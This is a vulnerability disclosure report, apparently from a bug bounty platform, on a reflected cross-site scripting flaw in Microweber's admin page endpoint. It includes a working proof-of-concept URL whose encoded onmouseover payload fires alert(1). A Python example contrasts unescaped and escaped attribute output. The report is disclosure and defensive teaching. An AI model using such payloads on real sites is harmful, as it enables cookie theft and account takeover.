Cross-site Scripting (XSS) - Reflected in microweber/microweber
Feb 19th 2022
Hi, the endpoint https://demo.microweber.org/demo/admin/page is vulnerable to Cross-Site Scripting.
Proof of Concept
Just navigate to the PoC URL: https://demo.microweber.org/demo/admin/page/8tojh1%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22yrr2n/edit
Now move your mouse over the page; you will see an XSS popup.
(Log in if the site asks.)
Cross-site scripting attacks can lead to account takeover via cookie stealing, temporary site defacement, redirecting users to attacker-controlled sites, etc.
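The encoding failure behind this report, as an added example that is not Microweber's code (Microweber is PHP; this Python stand-in is assumed for illustration): the unsafe renderer interpolates the decoded PoC path segment straight into an attribute value, the hardened one applies attribute-context encoding, and a parser check shows which markup ends up carrying an injected event handler.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Still-URL-encoded path segment from the PoC URL quoted in this report.
POC_SEGMENT = (
    "8tojh1%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3b"
    "width%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22yrr2n"
)

def decoded_poc() -> str:
    """The segment as the application sees it after URL decoding."""
    return unquote(POC_SEGMENT)

def render_unsafe(page_id: str) -> str:
    """Hypothetical stand-in for the vulnerable pattern: the decoded path
    segment is dropped into an attribute value with no output encoding."""
    return f'<input name="id" value="{page_id}">'

def render_safe(page_id: str) -> str:
    """Hardened form: attribute-context encoding. quote=True turns every
    '"' into &quot;, so the injected text can never close the attribute."""
    return f'<input name="id" value="{html.escape(page_id, quote=True)}">'

class _AttrCollector(HTMLParser):
    """Records every attribute the parser sees on start tags."""
    def __init__(self) -> None:
        super().__init__()
        self.attrs: list = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)

def tag_attributes(markup: str) -> dict:
    """Parse the tag the way a browser would and return {name: value}.
    Values come back entity-decoded, so a correctly escaped value
    round-trips to the original string."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return dict(parser.attrs)

def injected_handlers(markup: str) -> list:
    """Names of on* event-handler attributes on the tag; any hit means
    user input escaped the attribute context it was placed in."""
    return sorted(n for n in tag_attributes(markup) if n.startswith("on"))

if __name__ == "__main__":
    print("unsafe:", injected_handlers(render_unsafe(decoded_poc())))  # ['onmouseover']
    print("safe:  ", injected_handlers(render_safe(decoded_poc())))    # []
```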
Peter Ivanov validated this vulnerability a year ago
Damanpreet has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed in 1.2.11 with commit f7f5d4 a year ago
This vulnerability will not receive a CVE